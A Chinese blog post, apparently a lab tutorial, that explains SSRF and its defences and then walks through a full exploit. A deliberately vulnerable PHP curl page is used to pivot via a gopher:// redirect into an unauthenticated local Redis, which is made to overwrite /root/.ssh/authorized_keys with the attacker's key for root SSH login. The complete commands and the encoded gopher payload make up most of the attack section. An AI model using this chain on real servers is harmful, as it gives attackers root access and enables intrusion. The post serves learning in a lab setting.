ssrf实现.SSH未创建写shell

已于 2024-08-26 02:14:04 修改
阅读量441 收藏 3
点赞数 4
文章标签: ssh 运维
于 2024-08-26 02:12:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75432117/article/details/141537822
版权

SSRF

定义:

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

原理:

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

防御:

1,过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。

2, 统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。

3,限制请求的端口为http常用的端口,比如,80,443,8080,8090。

4,黑名单内网ip。避免应用被用来获取获取内网数据,攻击内网。

5,禁用不需要的协议。仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。

ssrf实现.ssh未创建写shell:

1、环境搭建

需要kali和Ubuntu虚拟机各一台

ubuntu:

test.html:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form action="test.php" method="post">
        input url: <input type="text" name="url"><br>
        <input type="submit" value="submit">
 
    </form>
</body>
</html>

test.php:

<?php
        function check_ip($url)         
        {
                $match_res=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
                if(!$match_res)
                {
                        echo 'url fomat erro';
                        exit();
                }
                try
                {
                        $url_parse=parse_url($url);
                }
                catch(Exception $e)
                {
                        echo 'url fomat error';
                        exit();
                }
                $ip=gethostbyname($url_parse['host']);
                echo $ip;
                $ini_ip=ip2long($ip);
                if ($ini_ip>>24==ip2long('127.0.0.0')>>24||$ini_ip==ip2long('服务机公网ip'))
                {
                        echo "ip can not inner ip";
                        exit();
                }
        }
 
        $ch=curl_init();
        $url=$_GET['url'];
        check_ip($url);
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_HEADER,0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_REDIR_PROTOCOLS,CURLPROTO_GOPHER);  
        curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);                  
        $res=curl_exec($ch);
        curl_close($ch);
        echo $res;
 
?>

2、实施攻击

kali:

执行 ssh-keygen -t rsa 生成攻击机的SSH公钥数据:
cd /root/.ssh
ssh-keygen -t rsa

用SSH公钥数据伪造Redis数据:
Socat -v tcp-listen:1234,fork tcp-connect:localhost:6379 
redis-cli -p 1234 fushall 
 
echo -e "\n\n
ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABgQDa1V8TRqynbl7Lx0eOuOB3k7f4o9m0jtj96X7Z5BW3HCUagionxr5FRzV6GHjKzjJYrFf43QsedgnY3UPZEx0oo3QVZhRsacx3/qkSevkZvA+KpBygyH/2/OUIlpXtgWLilkxSy8yWSGc573gtHJhNgdrtaGUahHprCM1RTBqCkC7SeYN07kUhXuDAlZrJKyT3G2jI3LHcz6O4EJF4n2zZlm2IOQupdfEhiZAKs4GX+7SZ/kK1JWlEy/m12cUcQrDzTPFKVM/RQ6h5+gKshq+f5IMtzXuN3m0WZ9vXoHMnsVrGNBdd++7Hd2bHSMLnhjgdH9x8BEner4QR0WgRTMySkRj9Gqoc8QMRJpl8CzNrKEEOAkRScDW26qaAaKW4V44Nuupq2HO0QYWCEvOMGEQYVj2zM66VqZTZHaZhj5Gnkot3vo6/6h1bcTiOlIt7DCIIP1q+2fg3SUL9JsH3denkc/QUrAOoBlvfL3ruvCbTVgW4HM20kH+ltpt5RdKf0s0= root@kali\n\n" | redis-cli -p 1234 -x set a  
 
redis-cli -p 1234 config set dir /var/www/html/  
 
redis-cli -p 1234 config set dbfilename shell.php   
 
redis-cli -p 1234 save

在kali下写个attack.php:
<?php
header("Location: gopher://127.0.0.1:6379/_*1%0d%0A%248%0d%0Aflushall%0d%0A*3%0d%0A%243%0d%0Aset%0d%0A%241%0d%0A1%0d%0A%24567%0d%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDa1V8TRqynbl7Lx0eOuOB3k7f4o9m0jtj96X7Z5BW3HCUagionxr5FRzV6GHjKzjJYrFf43QsedgnY3UPZEx0oo3QVZhRsacx3/qkSevkZvA+KpBygyH/2/OUIlpXtgWLilkxSy8yWSGc573gtHJhNgdrtaGUahHprCM1RTBqCkC7SeYN07kUhXuDAlZrJKyT3G2jI3LHcz6O4EJF4n2zZlm2IOQupdfEhiZAKs4GX+7SZ/kK1JWlEy/m12cUcQrDzTPFKVM/RQ6h5+gKshq+f5IMtzXuN3m0WZ9vXoHMnsVrGNBdd++7Hd2bHSMLnhjgdH9x8BEner4QR0WgRTMySkRj9Gqoc8QMRJpl8CzNrKEEOAkRScDW26qaAaKW4V44Nuupq2HO0QYWCEvOMGEQYVj2zM66VqZTZHaZhj5Gnkot3vo6/6h1bcTiOlIt7DCIIP1q+2fg3SUL9JsH3denkc/QUrAOoBlvfL3ruvCbTVgW4HM20kH+ltpt5RdKf0s0= root@kali%20root@kali%0A%0A%0A%0d%0A*4%0d%0A%246%0d%0Aconfig%0d%0A%243%0d%0Aset%0d%0A%243%0d%0Adir%0d%0A%2411%0d%0A/root/.ssh/%0d%0A*4%0d%0A%246%0d%0Aconfig%0d%0A%243%0d%0Aset%0d%0A%2410%0d%0Adbfilename%0d%0A%2415%0d%0Aauthorized_keys%0d%0A*1%0d%0A%244%0d%0Asave%0d%0A");
?>
在/root/.ssh目录下:
ssh -i id_rsa root@IP地址

最后登录。

无奈^
关注
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1361
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
ssrf漏洞php代码审计1
m0_55772907的博客
04-30 1104
(1)原理 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 (2)分类 1)curl_exec 发现存在url传递。在这里提交url参数和内容,服务器用函数curl_exec()执行,并将结果输出 在下面页面做测试发现可以正常跳转,所以可以在此去执行一些恶意操作。 2)file_get_co.
SSRF攻击
qq_64951792的博客
08-25 928
ssrf
SSRF攻击原理
xiaoyaGrace的博客
05-21 131
什么是SSRF# 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是觉得原本不可能访问到内网的主机,现在就很容易就能做到了。 原理# PHP代码演示: Copy $url = $_GET['URL']; curl($url); function curl($url){ ..
SSRF漏洞原理攻击与防御(超详细总结)
shandongjiushen的博客
04-23 1431
漏洞挖掘必看
【web渗透】SSRF漏洞超详细讲解
2401_84215240的博客
08-07 1493
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
由于服务器通常位于网络边界设备的“安全”区域内,攻击者如果能够利用 SSRF 漏洞,便有可能访问到内网设备、服务或数据,实现数据泄露或攻击内网其他系统。另外,攻击者还可以利用 SSRF 漏洞进行端口扫描、获取敏感...
服务器端请求伪造(SSRF)漏洞解析
CoffeMilk的博客
09-27 1074
SSRF攻击是通过连接外网的Web服务器与它相连而与外网隔离的内部服务器或系统。 SSRF形成的原因大部分是由于该连通外网的服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。利用该连通外网服务器端存在缺陷的web程序作为代理攻击远程和本地的服务器。
WEB漏洞——SSRF
qq_63594215的博客
04-11 817
这次来介绍WEB漏洞的其中一种类型SSRF,文章将通过讲述其原理、如何挖掘以及怎么利用,包括如何防御和绕过,并且提供靶场来举例说明,详情请往下看。社交分享功能:获取超链接的标题等内容进行显示转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览在线翻译:给网址翻译对应网页的内容图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网址是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试。
SSRF漏洞原理、攻击与防御技巧(网安入门必备)
白帽黑客八哥的博客
12-12 954
SSRF是一种攻击,其中攻击者可以迫使服务器端应用程序向第三方服务器发送恶意构造的请求。这种攻击允许攻击者间接地与服务器内部或外部网络中的系统交互。
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5855
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
SSRF 漏洞的寻找
WHACKW的专栏
01-04 5499
SSRF 漏洞的寻找 一、从WEB功能上寻找 我们从上面的概述可以看出,SSRF是由于服务端获取其他服务器的相关信息的功能中形成的,因此我们大可以列举几种在web 应用中常见的从服务端获取其他服务器信息的的功能。 1)分享:通过URL地址分享网页内容 早期分享应用中,为了更好的提供用户体验,WEB应用在分享功能中,通常会获取目标URL地址网页内容中的标签或者标签中content的文本内容作
ssrf漏洞_SSRF漏洞攻击原理及防御方案
weixin_39992462的博客
12-08 294
01SSRF概念服务端请求伪造(Server-Side Request Forgery),指的是攻击者在能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。02SSRF的原理很多web应用都提供了从其他的服务器上获取数据的功能。使用指定的URL,web应用便可以获取图片,下载文件,读取文件内容等。SSRF的...
Django Nginx+uwsgi 安装配置
lly202406的博客
10-02 260
本文将详细介绍如何在Linux环境下安装和配置Django应用程序,使用Nginx作为Web服务器和uwsgi作为应用程序服务器。
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
最新发布
haidizym的博客
10-02 328
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
vulnhub-DC-2靶机的测试报告
ccc_9wy的博客
09-27 728
基于渗透测试流程详细渗透dc-2靶机;获取所有的5个flag;bp爆破用户名和密码;rbash逃逸;git的sudo提权;wordpress;cluster bomb模式;弱口令
weblogic ssrf 反弹shell
09-16
WebLogic SSRF 漏洞可以被滥用以执行远程代码,包括反弹 shell。下面是一种可能的方法: 1. 确保你有一台能够监听反弹 shell 的主机,并且已经在等待连接。 2. 使用 SSRF 漏洞向目标 WebLogic 服务器发送 HTTP 请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值